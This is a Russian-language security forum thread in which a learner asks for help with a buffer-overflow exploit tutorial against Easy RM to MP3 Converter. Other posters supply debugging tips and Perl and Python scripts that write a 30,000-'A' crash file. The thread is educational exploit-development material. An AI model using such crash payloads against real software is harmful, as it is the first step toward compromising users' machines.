• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Не могу следовать туториалу по написанию эксплойта

Scarecrow Robot

New member
09.05.2019
3
0
BIT
0
Привет.

Следую этому туториалу:


У него в EIP указан 41414141. Что является шестнадцатиричным представлением AAAA. Но у меня на win xp 32 и win 7 32 в EIP указан адрес на ntdll. Что мне с этим делать? Там дальше по туториалу совсем другое.

Спасибо.
 

Вложения

  • Снимок1.PNG
    Снимок1.PNG
    32,4 КБ · Просмотры: 216

HebiNeco

Green Team
31.08.2019
124
35
BIT
0
Сделай скриншоты по всем действиям, которые делаешь. Не понятно, на каком моменте произошла ошибка. Т.е. может ты что-то до этого не так написал или что-то пропустил.
 

Scarecrow Robot

New member
09.05.2019
3
0
BIT
0
@HebiNeco, @polunochnik

Создаю m3u файл с таким кодом:


Код:
#!usr/bin/perl
my $file= "crash.m3u";
my $junk= "\x41" x 30000;
open($FILE,">$file");
print $FILE "$junk";
close($FILE);
print "m3u File Created successfully\n";

Затем в Easy Rm to MP3Converter загружаю m3u. Появляется ошибка.

crash.PNG

Прикрепляюсь к процессу уязвимой программы в immunity debugger. Но вместо значения EIP 41414141 там адрес с ntdll.

2.PNG

Хотя в гайде там вот так должно быть:

immunity1.png

Все это делаю на виртуальной win 7 32 virtualBox.
 

polunochnik

Green Team
30.05.2019
69
3
BIT
0
@HebiNeco, @polunochnik

Создаю m3u файл с таким кодом:


Код:
#!usr/bin/perl
my $file= "crash.m3u";
my $junk= "\x41" x 30000;
open($FILE,">$file");
print $FILE "$junk";
close($FILE);
print "m3u File Created successfully\n";

Затем в Easy Rm to MP3Converter загружаю m3u. Появляется ошибка.

Посмотреть вложение 42099

Прикрепляюсь к процессу уязвимой программы в immunity debugger. Но вместо значения EIP 41414141 там адрес с ntdll.

Посмотреть вложение 42100

Хотя в гайде там вот так должно быть:

Посмотреть вложение 42101

Все это делаю на виртуальной win 7 32 virtualBox.
1. Ести отладочные символы?
2. Памяти нет, не понятно какая сейчас ситуация на стеке,
3. пробовал в отладчика на несколько шагов вперёд пройти
4. Точно так же как в гайде не будет, там ХР, а у тебя семёрка.
5. При краше приложения у тебя было в сообщении адрес 0x41414141, но в отладчике ничего
 

Scarecrow Robot

New member
09.05.2019
3
0
BIT
0
@polunochnik

1. Включил. Не помогло.
2. Это какая вкладка в дебаггере? Memory?

3.PNG

3. Не знаю как это сделать.
4. Вот человек сделал гайд с 7
 

polunochnik

Green Team
30.05.2019
69
3
BIT
0
@polunochnik

1. Включил. Не помогло.
2. Это какая вкладка в дебаггере? Memory?

Посмотреть вложение 42106

3. Не знаю как это сделать.
4. Вот человек сделал гайд с 7
Смотри, eip у тебя не такой как в гайде, потому что банально ты в отладчике не дошёл до момента падения.
Я бы все таки начал бы с чего попроще (ранее кидал ссылку на серию статей), что бы сложилось понимание как это все работает, тогда и большинство вопросов отпадут сами собой.
 

fuzzz

Red Team
03.02.2019
249
468
BIT
1
@HebiNeco, @polunochnik

Создаю m3u файл с таким кодом:


Код:
#!usr/bin/perl
my $file= "crash.m3u";
my $junk= "\x41" x 30000;
open($FILE,">$file");
print $FILE "$junk";
close($FILE);
print "m3u File Created successfully\n";
Не надо создавать файл .m3u с таким кодом!!!!!!!
Это скрипт на языке программирования Perl который создает файл .m3u внутри которого будет 30 тыщ букв "A".
Ты можешь сделать тоже самое на языке Python.

Python:
#!/usr/bin/env python
# -*- coding: utf-8 -*-

payload = "A" * 30000
exploit = open("evil.m3u", "w")
exploit.write(payload)
exploit.close()
print("m3u File Created successfully")

ошибка в том что ты запихал код в файл .m3u, когда надо было запустить код, который создаст этот файл.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!